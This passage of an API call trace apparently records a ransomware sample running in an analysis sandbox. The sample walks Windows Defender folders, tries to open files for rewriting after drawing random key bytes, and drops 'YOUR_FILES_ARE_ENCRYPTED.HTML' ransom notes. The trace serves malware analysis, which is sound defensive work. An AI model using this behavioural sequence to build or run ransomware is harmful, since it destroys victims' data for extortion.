ftCreationTime.dwLowDateTime=0xe3226d0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe3226d0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe3226d0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63f110, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="MpAvDlta.vdm", cAlternateFileName="")) returned 1 [0110.226] StrStrIW (lpFirst="MpAvDlta.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.226] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpAvDlta.vdm") returned 89 [0110.226] PathFindExtensionW (pszPath="MpAvDlta.vdm") returned=".vdm" [0110.226] lstrlenW (lpString=".vdm") returned 4 [0110.226] PathFindExtensionW (pszPath="MpAvDlta.vdm") returned=".vdm" [0110.226] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe3226d0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa8cc80, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="MpEngine.dll", cAlternateFileName="")) returned 1 [0110.226] StrStrIW (lpFirst="MpEngine.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.226] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpEngine.dll") returned 89 [0110.226] PathFindExtensionW (pszPath="MpEngine.dll") returned=".dll" [0110.226] lstrlenW (lpString=".dll") returned 4 [0110.226] PathFindExtensionW (pszPath="MpEngine.dll") returned=".dll" [0110.226] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\MpEngine.dll" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\default\\mpengine.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.226] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd1d10, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="NisBase.vdm", cAlternateFileName="")) returned 1 [0110.226] StrStrIW (lpFirst="NisBase.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.226] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\NisBase.vdm") returned 88 [0110.226] PathFindExtensionW (pszPath="NisBase.vdm") returned=".vdm" [0110.226] lstrlenW (lpString=".vdm") returned 4 [0110.226] PathFindExtensionW (pszPath="NisBase.vdm") returned=".vdm" [0110.226] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2fc46e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2fc46e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2fc46e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3aa0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="NisFull.vdm", cAlternateFileName="")) returned 1 [0110.226] StrStrIW (lpFirst="NisFull.vdm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.226] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\NisFull.vdm") returned 88 [0110.226] PathFindExtensionW (pszPath="NisFull.vdm") returned=".vdm" [0110.226] lstrlenW (lpString=".vdm") returned 4 [0110.226] PathFindExtensionW (pszPath="NisFull.vdm") returned=".vdm" [0110.226] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf160bea, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf160bea, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1646b5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.226] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf160bea, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf160bea, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1646b5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.226] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0110.227] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0110.227] GetProcessHeap () returned 0x600000 [0110.227] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.227] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Default\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\default\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.227] GetProcessHeap () returned 0x600000 [0110.227] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.227] GetProcessHeap () returned 0x600000 [0110.227] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.228] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="NisBackup", cAlternateFileName="NISBAC~1")) returned 1 [0110.228] StrStrIW (lpFirst="NisBackup", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.228] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup") returned 78 [0110.228] GetProcessHeap () returned 0x600000 [0110.228] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.229] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup" [0110.229] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\*" [0110.229] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf16cf3e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.229] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf16cf3e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0110.229] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf16cf3e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf16cf3e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf17096c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.229] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf16cf3e, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf16cf3e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf17096c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.229] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.230] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0110.230] GetProcessHeap () returned 0x600000 [0110.230] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\NisBackup\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\nisbackup\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.230] GetProcessHeap () returned 0x600000 [0110.230] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.230] GetProcessHeap () returned 0x600000 [0110.230] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.231] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="Updates", cAlternateFileName="")) returned 1 [0110.231] StrStrIW (lpFirst="Updates", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.231] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 76 [0110.231] GetProcessHeap () returned 0x600000 [0110.231] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.232] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0110.232] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*" [0110.232] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1780ba, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x626738 [0110.232] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1780ba, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0110.232] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1780ba, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1780ba, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf17b939, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.232] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1780ba, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1780ba, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf17b939, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62f5f0, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.232] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0110.232] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0110.232] GetProcessHeap () returned 0x600000 [0110.232] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.233] GetProcessHeap () returned 0x600000 [0110.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.233] GetProcessHeap () returned 0x600000 [0110.233] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.234] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf19b542, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf19b542, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1a2a6f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.234] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf19b542, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf19b542, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1a2a6f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.234] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.234] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0110.234] GetProcessHeap () returned 0x600000 [0110.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.234] GetProcessHeap () returned 0x600000 [0110.234] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.234] GetProcessHeap () returned 0x600000 [0110.234] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.235] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Features", cAlternateFileName="")) returned 1 [0110.235] StrStrIW (lpFirst="Features", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.235] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features") returned 58 [0110.235] GetProcessHeap () returned 0x600000 [0110.235] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.236] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features" [0110.236] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features\\*" [0110.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1ac95c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.236] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1ac95c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.236] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1ac95c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1ac95c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1b16f1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.236] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1ac95c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1ac95c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1b16f1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.236] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.236] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0110.236] GetProcessHeap () returned 0x600000 [0110.236] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Features\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\features\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.237] GetProcessHeap () returned 0x600000 [0110.237] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.237] GetProcessHeap () returned 0x600000 [0110.237] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.237] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="LocalCopy", cAlternateFileName="LOCALC~1")) returned 1 [0110.237] StrStrIW (lpFirst="LocalCopy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.237] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned 59 [0110.237] GetProcessHeap () returned 0x600000 [0110.237] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.238] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy" | out: 